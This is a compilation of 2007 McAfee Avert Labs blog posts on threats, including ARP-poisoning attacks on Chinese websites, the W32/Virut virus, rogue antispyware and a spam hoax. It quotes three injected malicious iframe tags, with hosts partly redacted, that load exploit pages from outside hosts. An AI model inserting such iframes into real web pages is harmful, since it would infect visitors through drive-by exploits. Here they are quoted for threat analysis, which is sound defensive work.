What is antivirus protection worth when users try all the tricks they know to see the Loveletter.jpg.vbs picture; why do they double-click on executable files? No matter whether it’s Kournikova, Labor Day greetings cards, or just an “undeliverable message” with “details” attached, many users don’t care.

Home users risk their privacy and may lose the ownership of their machines, but they can’t resist the temptation.

Corporate users are sometimes even less careful, as it’s not their machine and if it’s broken, it’s not their problem. The IT department will fix it.

“If the company sends the mails to my machine, they know what they are doing. Why shouldn’t I click on those mails?” I heard that once from a corporate user–it scared me, because it was that user who was causing an internal outbreak.

While that user enjoyed the weekend, the IT guys tried to regain control of their network. About 15 employees of that company were working the whole weekend, plus external consultants.

That was one of the most expensive double-clicks that company ever had.

Is it that hard to think twice?
Don’t users know enough about risks?
Don’t they know about the consequences of an outbreak?

What have we learned from history?

C’mon, it’s not that hard.

Next time you receive an unexpected (mail)-delivery, think twice before you let it pass your last line of defense.

In 2004 and 2005, the AOL/NCSA surveys revealed a significant gap between security perceptions versus reality. Many consumers thought they were correctly protected against malware, when in fact, they were not.

These days, McAfee and its competitors propose and provide automatic updates, but the problem is still very topical. The very latest McAfee/NCSA survey shows the scope of this issue. And unfortunately, improvement has been poor in the last two years. If I dared, I would say the situation is perhaps worse because minimum security needs daily update not weekly and there is more malware written today than ever before.

The need to educate consumers is more than ever necessary with nearly nine in ten Americans online to use their computer for banking, stock trading or reviewing personal medical information.

The McAfee/NCSA Online Safety Study is available here. It starts with “Think Your Home Computer Is Safe? Think Again” and contains very interesting data regarding Americans’ opinions of their computer security vs the reality.

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don’t mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware, will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

Over the last couple of months, we have discussed a few times about how public and commercial web hosting services can be abused to host malware, exploits and send spam.

This week was the “golden week” holiday season in China, and hackers decided that this is a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced in their blog on Tuesday, October 2nd, that malicious IFRAMEs were inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and method of intrusion.

According to C.I.S.R.T.’s own investigations, it was an ARP poisoning attack originating from the web service provider’s network. And you guessed it, the web service engineers are away for the week.

ARP poisoning is a man-in-the-middle style attack that injects malicious code into communication between the gateway and the web servers. On the C.I.S.R.T. website, the following malicious IFRAME links were inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities that are being targeted by the obfuscated exploits inserted into the web pages - Exploit-MS06-014 and Exploit-BaoFeng.a. Both vulnerabilities had been patched by their respective vendors, and the latter, affected a popular Chinese media player. A quick check on several other virtual hosts on the same provider, we found at least one more web site that is also injected with malicious links:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>

ARP poisoning is old school but it can still be deadly when used in a virtual domain hosting environment, allowing an attacker to infect many websites from one gateway as seen in some instances of the HTool-MPack attack, affecting thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes how web page code injection is achievable via ARP spoofing in his blog. Trojan tool kits such as NetSniff have these functionalities built-in, making it easy for attackers to perform it. On the hand, it a “noisy” technique and spoofed ARP packets can be easily detected on the wire.

If you had planned to review your website’s security and discuss it with your service provider, now might be good time.

Š

Thought I’d pass along some Friday giggles to take you all into the weekend.

In a former job-incarnation I was a florist, which has left me with certain plant geek tendencies. It’s very rare for my security-geek and plant-geek worlds to cross, but today they did. Apparently certain plants which grow by underground runners (or “stolons“) use those connections as sort of an Instant Messenging platform.

On the plus side, if one plant is attacked by caterpillars, the rest will fortify themselves against attack. On the minus side, if one plant gets infected with a virus, so will the rest of them.

Clearly clovers lack the resources for a proper layered defense strategy.

Maybe they’re not up to date on their software patches or security updates. …Or maybe they’ve been falling for clover-social engineering - some mischevious clover sending nasty links by IM.

In this age of botnets, rootkits, spyware and other bleeding edge security threats, file infectors are frequently thought of as a dead threat. But over the past year or so, we have seen a resurgence in classic file infecting viruses. Parasitic threats such as W32/Bacalid, W32/Detnat and W32/Polip have enjoyed a relatively high degree of success in the wild causing widespread damage to computer systems.

An upcoming new kid on the block is W32/Virut - a polymorphic entry-point obscuring virus with IRC bot functionality. Once a machine is infected, it hooks the following APIs (ZwCreateFile, ZwCreateProcess, ZwCreateProcessEx, ZwOpenFile) in ntdll.dll for all running processes, in an attempt to infect .EXE and .SCR files. It then “phones home” to a remote IRC command and control server where it can be instructed to download other malware or be used to perform DDoS attacks.

W32/Virut comes with its share of buggy code and as a result it may misinfect or reinfect a significant proportion of executable files leaving them permanently corrupted beyond repair. Some variants make the trivial mistake of not checking PE section boundaries while infecting and this causes infected executables to crash when run. Also, the virus sometimes hijacks its own function calls which leads to an infinite loop. No one ever said viruses had the best programming

The creator of W32/Virut appear to have a fancy for the works of Friedrich Nietzsche - a nineteenth century German philosopher. Embedded in the virus body is an excerpt from a poem by Nietzsche.

O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It’s late!

Virus code is usually known to contain personal taunts directed towards the antivirus community or flames against rival malware authors. But quoting Friedrich Nietzsche - that’s deep! (Credits to Naveen Gooty for analysis but Dave Marcus still doubts the translation used in the virus code!!).

Organizations have traditionally blocked outbound Simple Mail Transfer Protocol (SMTP) traffic on port 25 that originates from the local area network (LAN) and virtual private network (VPN) segments. This is done to prevent any internal machine that has been infected with a mass-mailer from spamming the outside world. Email can be traced back to its origin via ip address information contained in the mail header, and no organization wants to be held responsible for spreading malware onto the internet – it would be a public relations nightmare.

By blocking port 25 at the firewall, an organization prevents a mass-mailer from spreading. However, by blindly blocking outgoing SMTP traffic, valuable information on real-time internal infections or data leakage arising from threats that use port 25 is lost.

In this month’s Oct 2007 edition of Virus Bulletin, we proposed the need for an in-house SMTP honeypot. A copy of this article titled “The need for an in-house SMTP Honeypot” can be downloaded from our McAfee Avert Labs Technical White Papers page.

Simple Mail Transfer Protocol honeypots have traditionally been used to masquerade as open-relays in order to frustrate spammers and harvest spam. With changed spammer tactics over the years, it is high time we revisited traditional countermeasures and improved upon them.

Following our blog about the significance of web hosting security vs ARP spoofing, our friends from security vendor ESET made an official statement on October 9th, about an ARP attack against their official China website earlier this week. Identical to other ARP attacks, their web pages were found inserted with the following malicious IFRAME link:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014 , can download a variety of malware including:

• vip1.htm (Exploit-BaoFeng.a)
• 0.exe (PWS-QQGame)
• kvmxeis.exe (PWS-OnlineGames.a)
• ii.exe (PWS-QQPass.dll)
• SysWin78.Jmp (PWS-QQGame)
• WinSys88.Sys (PWS-QQGame)
• System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also rapidly evolved from common Microsoft vulnerabilities - Exploit-MS06-014, Exploit-MS07-004, etc. to application-level vulnerabilities such as Yahoo Messenger, a Chinese media player called Baofeng and PPStream.

Network intrusion prevention security, web server policies and patch management comes to mind as needed minimum defenses and should to be reviewed by companies both using or offering web services as well as ISPs.

Adware and Spyware have long been the bane of computer users, probably even more than viruses. Most of the time malware authors employ the age-old art of social engineering to victimize the not so tech-savvy computer users into installing Adware and Spyware. Over time, these people came up with innovative methods to convince a user into installing these so-called AntiSpyware programs.

This time, it’s a fake Microsoft AntiSpyware website that is promoting the rogue AntiSpyware application, AntiSpyStorm. Avert had earlier blogged about rogue AntiSpyware applications like SystemDoctor and we have probably classified several hundreds of them, if not thousands. This threat appears to be a successor to the trojan FakeAlert-D.

This Fake Microsoft AntiSpyware Center page purports to be an “Online Security Scanner” which scans the system for viruses and spywares. After the dupery scanning, the user will be presented with a dubious and falsified list of Trojans after which the user will be prompted to download and install an ActiveX Control to remove the threats.

The infection starts when the unsuspecting user installs the alleged ActiveX control. The trojan hijacks the Internet explorer homepage, shows fake alerts and exaggerated security threats which instigates a user to install a trial version of AntiSpyStorm product.

After installation the product offers a free system scan for threats. The reports of this scan are exaggerated and contain false errors reported as actual threat. When the user is scared into believing these threats are real, AntiSpyStorm offers the victim to download the full version and tricks the victim into entering his credit card details.

I have put together a short video which shows how an unsuspecting user could get infected.

The rogue Anti-Spyware is detected with the current DATS as Adware-AntiSpyStorm and the fake ActiveX control is detected as FakeAlert-T.

It seems that today someone invented a new way of fighting spam. The idea is simple—scare spammers to death by circulating a hoax that one of their ilk has just been murdered! It would not take long for people to conclude that such a poor fate might be related to the professional activities of the deceased. The following blog appeared today on one of the anonymous sites and immediately got wide attention:

To reinforce the story they even included a reference to a real story back from 2005 when the most prolific Russian spammer—Vardan Kushnir—was killed in Moscow. There is a big “but” here though. The widespread belief that the murder of Vardan Kushnir in July 2005 was related to spam distribution collapsed after the real killers were detained one month later. It’s ironic, though perhaps typical of how media works, that unfounded speculations received much wider publicity than the facts that became available once the murder case was closed.

As much as we at McAfee Avert Labs would like to reduce the level of spam, we just have to conclude that spammers can still sleep well at night.